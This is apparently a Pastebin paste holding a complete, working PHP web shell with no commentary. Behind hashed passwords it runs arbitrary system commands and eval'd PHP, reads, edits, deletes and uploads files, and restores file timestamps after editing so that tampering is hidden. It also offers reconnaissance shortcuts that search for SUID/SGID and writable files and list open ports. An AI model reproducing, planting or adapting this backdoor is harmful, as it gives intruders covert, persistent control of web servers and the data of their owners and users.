Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- clearstatcache ();
- set_magic_quotes_runtime ( 0 );
- if (! function_exists ( 'ini_set' )) {
- function ini_set() {
- return FALSE;
- }
- }
- ini_set ( 'output_buffering', 0 );
- if (@set_time_limit ( 0 ) || ini_set ( 'max_execution_time', 0 ))
- $limit = 'not limited';
- else
- $limit = get_cfg_var ( 'max_execution_time' );
- if (isset ( $HTTP_SERVER_VARS ) && ! isset ( $_SERVER )) {
- $_POST = &$HTTP_POST_VARS;
- $_GET = &$HTTP_GET_VARS;
- $_SERVER = &$HTTP_SERVER_VARS;
- }
- if (@get_magic_quotes_gpc ()) {
- foreach ( $_POST as $k => $v )
- $_POST [$k] = stripslashes ( $v );
- foreach ( $_SERVER as $k => $v )
- $_SERVER [$k] = stripslashes ( $v );
- }
- if (! isset ( $_GET ['z'] ) || md5 ( $_GET ['z'] ) !== '95e1ebd665d6df61319c938b954f913c')
- die ();
- function execute($c) {
- if (function_exists ( 'exec' )) {
- @exec ( $c, $out );
- return @implode ( "\n", $out );
- } elseif (function_exists ( 'shell_exec' )) {
- $out = @shell_exec ( $c );
- return $out;
- } elseif (function_exists ( 'system' )) {
- @ob_start ();
- @system ( $c, $ret );
- $out = @ob_get_contents ();
- @ob_end_clean ();
- return $out;
- } elseif (function_exists ( 'passthru' )) {
- @ob_start ();
- @passthru ( $c, $ret );
- $out = @ob_get_contents ();
- @ob_end_clean ();
- return $out;
- } else {
- return FALSE;
- }
- }
- function read($f) {
- $str = @file ( $f );
- if ($str) {
- $out = implode ( '', $str );
- } elseif (function_exists ( 'curl_version' )) {
- @ob_start ();
- $h = @curl_init ( 'file:/' . '/' . $f );
- @curl_exec ( $h );
- $out = @ob_get_contents ();
- @ob_end_clean ();
- } else {
- $out = 'Could not read file!';
- }
- return htmlspecialchars ( $out );
- }
- function write($f, $c) {
- $t = filemtime ( $f );
- $fp = @fopen ( $f, 'w' );
- if ($fp) {
- fwrite ( $fp, $c );
- fclose ( $fp );
- $out = 'File saved.' . "\n";
- if ($t && touch ( $f, $t )) {
- $out .= 'Last modification
- time changed.';
- } else {
- $out .= 'Could not change last modification
- time!';
- }
- } else {
- $out = 'Saving failed!';
- }
- return $out;
- }
- function file_size($f) {
- $size = filesize ( $f );
- if ($size < 1024)
- $size = $size . ' b';
- elseif ($size < 1048576)
- $size = round ( $size / 1024 * 100 ) / 100 . ' Kb';
- elseif ($size < 1073741824)
- $size = round ( $size / 1048576 * 100 ) / 100 . ' Mb';
- return $size;
- }
- $zzz = $_POST ['zzz'];
- if (! function_exists ( 'natcasesort' )) {
- function natcasesort($arr) {
- return sort ( $arr );
- }
- }
- if (! empty ( $_POST ['dir'] )) {
- $dir = $_POST ['dir'];
- if (! @chdir ( $dir ))
- $out = 'chdir() failled!';
- }
- $dir = getcwd ();
- (strlen ( $dir ) > 1 && $dir [1] == ':') ? $os_type = 'win' : $os_type = 'nix';
- if (! $os_name = @php_uname ()) {
- if (function_exists ( 'posix_uname' )) {
- $os_name = posix_uname ();
- } elseif ($os_name != getenv ( 'OS' )) {
- $os_name = '';
- }
- }
- if (function_exists ( 'posix_getpwuid' )) {
- $data = posix_getpwuid ( posix_getuid () );
- $user = $data ['name'] . '
- uid(' . $data ['uid'] . ') gid(' . $data ['gid'] . ')';
- } else {
- $user = '';
- }
- $safe_mode = get_cfg_var ( 'safe_mode' );
- $safe_mode ? $safe = 'on' : $safe = 'off';
- execute ( 'echo ssps' ) ? $execute = 'on' : $execute = 'off';
- $server = getenv ( 'SERVER_SOFTWARE' );
- if (! $server)
- $server = '---';
- $out = '';
- $tail = '';
- $aliases = '';
- if (! $safe_mode) {
- if ($os_type == 'nix') {
- $os .= execute ( 'sysctl -n kern.ostype' );
- $os .= execute ( 'sysctl -n
- kern.osrelease' );
- $os .= execute ( 'sysctl -n kernel.ostype' );
- $os .= execute ( 'sysctl -n kernel.osrelease' );
- if (empty ( $user ))
- $user = execute ( 'id' );
- $aliases = array ('' => '', 'find suid files' => 'find /
- -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm
- -02000 -ls', 'find all writable files in current dir' => 'find . -type f
- -perm -2 -ls', 'find all writable directories in current dir' => 'find .
- -type d -perm -2 -ls', 'find all writable directories and files in
- current dir' => 'find . -perm -2 -ls', 'show opened ports' => 'netstat -an |
- grep -i listen' );
- } else {
- $os_name .= execute ( 'ver' );
- $user .= execute ( 'echo %username%' );
- $aliases = array ('' => '', 'show runing
- services' => 'net start', 'show process list' => 'tasklist' );
- }
- }
- print <<<here
- <style>
- table {font:9pt Tahoma;border-color:white}
- input,select,file {background-color:#eeeeee}
- textarea {background-color:#f2f2f2}
- </style>
- <br>
- <center>
- <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
- <tr>
- <td>
- <form method=post>
- <table cellpadding=1 cellspacing=0 border=1 width=650>
- here;
- if (empty ( $zzz ) || md5 ( $zzz ) !== 'a841b9908eac74475729ae0be846d1b6') {
- print <<<here
- <tr>
- <td align=center>
- <input type=text name=zzz size=16 value="{$zzz}">
- </td>
- </tr>
- </table>
- here;
- die ();
- }
- if (! empty ( $_POST ['cmd'] )) {
- $out = execute ( $_POST ['cmd'] );
- }
- elseif (! empty ( $_POST ['php'] )) {
- ob_start ();
- eval ( $_POST ['php'] );
- $out = ob_get_contents ();
- ob_end_clean ();
- }
- elseif (! empty ( $_POST ['edit'] )) {
- $file = $_POST ['edit'];
- $out = read ( $file );
- $tail = '<input type=hidden name=dir value="' . $dir . '"><input type=hidden name=efile value="' . $file . '"><br><input type=submit>';
- }
- elseif (! empty ( $_POST ['save'] )) {
- $out = write ( $_POST ['efile'], $_POST ['save'] );
- }
- elseif (! empty ( $_POST ['remove'] )) {
- $obj = $_POST ['remove'];
- @is_dir ( $obj ) ? $res = @rmdir ( $obj ) : $res = @unlink ( $obj );
- $res ? $out = 'Removed successfully' : $out = 'Removing failed!';
- }
- elseif (! empty ( $_POST ['newdir'] )) {
- @mkdir ( $_POST ['newdir'] ) ? $out = 'Directory created.' : $out = 'Could not create directory!';
- }
- elseif (! empty ( $_POST ['newfile'] )) {
- @touch ( $_POST ['newfile'] ) ? $out = 'File created.' : $out = 'Could not create file!';
- }
- elseif (! empty ( $_POST ['alias'] )) {
- $out = execute ( $_POST ['alias'] );
- }
- elseif (! empty ( $_FILES ['ufile'] ['tmp_name'] )) {
- if (! is_uploaded_file ( $_FILES ['ufile'] ['tmp_name'] ) || @! copy ( $_FILES ['ufile'] ['tmp_name'], $dir . chr ( 47 ) . $_FILES ['ufile'] ['name'] ))
- $out = 'Could not upload file';
- else
- $out = 'Uploaded successfully.';
- }
- if (! $safe_mode)
- print <<<here
- <tr>
- <td>
- cmd
- </td>
- <td colspan=8 nowrap>
- <input type=text name=cmd size=97>
- <input type=hidden name=zzz value="{$zzz}">
- </td>
- </tr>
- here;
- print <<<here
- <tr>
- <td>
- php
- </td>
- <td colspan=8>
- <input type=text name=php size=97>
- </td>
- </tr>
- <tr>
- <td>
- actions
- </td>
- <td>
- edit
- </td>
- <td>
- <input type=text name=edit size=14>
- </td>
- <td>
- remove
- </td>
- <td>
- <input type=text name=remove size=14>
- </td>
- <td>
- new_dir
- </td>
- <td>
- <input type=text name=newdir size=14>
- </td>
- <td>
- new_file
- </td>
- <td>
- <input type=text name=newfile size=15>
- </td>
- </tr>
- here;
- if ($aliases) {
- print <<<here
- <tr>
- <td>
- aliases
- </td>
- <td colspan=8>
- <select name=alias>
- here;
- foreach ( $aliases as $k => $v ) {
- print '<option value="' . $v . '">' . $k . '</option>';
- }
- print <<<here
- </select>
- <input type=submit>
- </td>
- </tr>
- here;
- }
- print <<<here
- <tr>
- <td>
- dir
- </td>
- <td colspan=8>
- <input type=text value="{$dir}" name=dir size=97>
- </td>
- </tr>
- </form>
- <form method=post enctype=multipart/form-data>
- <tr>
- <td>
- upload
- </td>
- <td colspan=8>
- <input type=file name=ufile size=60> <input type=submit value="Upload">
- <input type=hidden name=dir value="{$dir}">
- <input type=hidden name=zzz value="{$zzz}">
- </td>
- </tr>
- </form>
- </table>
- <table cellpadding=0 cellspacing=0 border=1 width=650>
- <form method=post>
- <tr valign=top>
- <td width=70% bgcolor=#dddddd>
- <b>OS:</b> {$os_name}<br>
- <b>User:</b> {$user}<br>
- <b>Server:</b> {$server}<br>
- <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
- <input type=hidden name=zzz value="{$zzz}">
- </td>
- <td rowspan=2 bgcolor=#dddddd>
- here;
- if ($dp = @openDir ( $dir )) {
- $cObj = readDir ( $dp );
- while ( $cObj ) {
- if (@is_dir ( $cObj ))
- $theDirs [] = $cObj;
- elseif (@is_file ( $cObj ))
- $theFiles [] = $cObj;
- $cObj = readDir ( $dp );
- }
- closedir ( $dp );
- }
- if (! empty ( $theDirs )) {
- natcasesort ( $theDirs );
- if ($os_type == 'nix') {
- foreach ( $theDirs as $cDir ) {
- $color = 'black';
- if (is_writeable ( $cDir )) {
- $color = 'red';
- } elseif (is_readable ( $cDir )) {
- $color = 'blue';
- }
- print "<font color=" . $color . "><" . $cDir . "></font><br>";
- }
- } else {
- foreach ( $theDirs as $cDir ) {
- $tmp = $cDir . '/.ssps_tmp';
- if (@touch ( $tmp )) {
- $color = 'red';
- unlink ( $tmp );
- } elseif (opendir ( $cDir )) {
- closedir ();
- $color = 'blue';
- } else {
- $color = 'black';
- }
- print "<font color=" . $color . "><" . $cDir . "></font><br>";
- }
- }
- } else
- print '<br>open_basedir restriction in effect. Allowed path is ' . get_cfg_var ( 'open_basedir' );
- print '<br>';
- if (! empty ( $theFiles )) {
- natcasesort ( $theFiles );
- print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
- foreach ( $theFiles as $cFile ) {
- $size = file_size ( $cFile );
- if ($fp = @fopen ( $cFile, 'a' ))
- $color = 'red';
- elseif ($fp = @fopen ( $cFile, 'r' ))
- $color = 'blue';
- else
- $color = 'black';
- @fclose ( $fp );
- print '<tr><td width=100%><font color=' . $color . '>' . $cFile . '</font></td><td align=left>' . $size . '</tr>';
- }
- print '</table>';
- }
- print <<<here
- </td>
- </tr>
- ?>
- <tr valign=top>
- <td align=center>
- <form method=post>
- results:
- <textarea name=save cols=55 rows=15>{$out}</textarea>
- {$tail}
- <input type=hidden name=zzz value="{$zzz}">
- </form>
- </td>
- </tr>
- </table>
- </form>
- </td>
- </tr>
- </table>
- here;
- die ();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement